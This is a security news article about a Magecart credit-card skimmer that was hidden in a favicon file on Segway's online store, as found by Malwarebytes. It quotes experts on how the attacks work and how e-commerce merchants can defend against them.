Segway, maker of the iconic – and much-spoofed – personal motorized transporter familiar from guided city tours everywhere, has been serving up a nasty credit-card harvesting skimmer via its website that’s likely linked to Magecart Group 12.
That’s according to Malwarebytes, which noted that “We already have informed Segway so that they can fix their site, but are publishing this blog now in order to raise awareness.” Segway, which is now owned by Chinese company Ninebot, did not immediately return a request for confirmation that the site is cleaned.
Magecart is a loose umbrella term encompassing various affiliated groups of financially motivated cybercriminals who all employ a similar skimming malware to harvest information – in particular payment-card information – that shoppers enter into checkout pages on eCommerce websites. Magecart 12 is one of the latest iterations of the group, which is known for consistently switching up its tactics.
Typically, across Magecart groups, the skimmers are injected into unsuspecting merchant websites by exploiting vulnerable versions of popular eCommerce platforms, such as outdated iterations of Magento or WooCommerce. That’s what researchers believe may have happened here.
“While we do not know how Segway’s site was compromised, an attacker will usually target a vulnerability in the CMS itself or one of its plugins,” the team explained, in a Monday posting. “The hostname at store.segway[.]com is running Magento, the popular content management system (CMS) used by many eCommerce sites and also a favorite among Magecart threat actors.”
In terms of this campaign’s specific characteristics, Malwarebytes analysts estimated that the skimmer has been active since about Jan. 6, and that it has so far exposed victims in the United States (which makes up 55 percent of site visitors), Australia (39 percent), Canada (3 percent), the UK (2 percent) and Germany (1 percent).
“The compromise of the Segway store is a reminder that even well-known and trusted brands can be affected by Magecart attacks,” Malwarebytes noted. “While it usually is more difficult for threat actors to breach a large website, the payoff is well worth it.”
Hiding Inside a Favicon
Also of interest is the fact that the threat actors are embedding the skimmer inside a favicon.ico file. Favicons are small icon images that link to other websites.
Uriel Maimon, senior director of emerging technologies at cybersecurity company PerimeterX, noted that this type of innovation is becoming more common.
“Magecart attackers continue [to] get more creative with their techniques in order to evade detection, especially given advancements in security solutions over the years,” he said via email. “By hiding the skimmer script inside a favicon pretending to display the site’s copyright, neither manual code reviews, static code analysis or scanners could have detected this easily.”
Assume Magecart is Coming After Your eCommerce Site
The skimmer itself is a known quantity, researchers noted – it’s cropped up in campaigns since at least 2020, including those carried out by Magecart 12.
Further, the Magecart cybercriminal group overall has been operating for several years and has skimmed from many large organizations, stealing names, emails, credit-card information and more, all of which sells on the Dark Web for profit. Their activity is vociferous: A recent Risk IQ report in December found that a Magecart attack on a website happens once every 16 minutes.
Because of all of that, eCommerce merchants should assume they’re being targeted, noted James McQuiggan, security awareness advocate at KnowBe4.
“In this situation, cybercriminals…have about sixteen lines of code injected into the application for credit-card processing,” McQuiggan said via email. “Organizations must monitor web traffic for applications sending data to unknown locations. A robust change-management program to monitor code changes to sites and third-party products can reduce the risk of a successful attack and maintain a solid cyber resiliency.”
E-commerce businesses could also use a a real-time monitoring solution that detects access to sensitive fields and attempts to exfiltrate personally identifiable information from the client side, PerimeterX’s Maimon said.
“It is important that users of Magento understand the need to disrupt the web attack lifecycle by stopping the theft of account and identity information from their site, and implement a solution to help do that,” he explained. “Taking action before it is too late will also help prevent damage to the brand’s reputation as well as limit potential liability for non-compliance.”
Check out our free upcoming live and on-demand online town halls – unique, dynamic discussions with cybersecurity experts and the Threatpost community.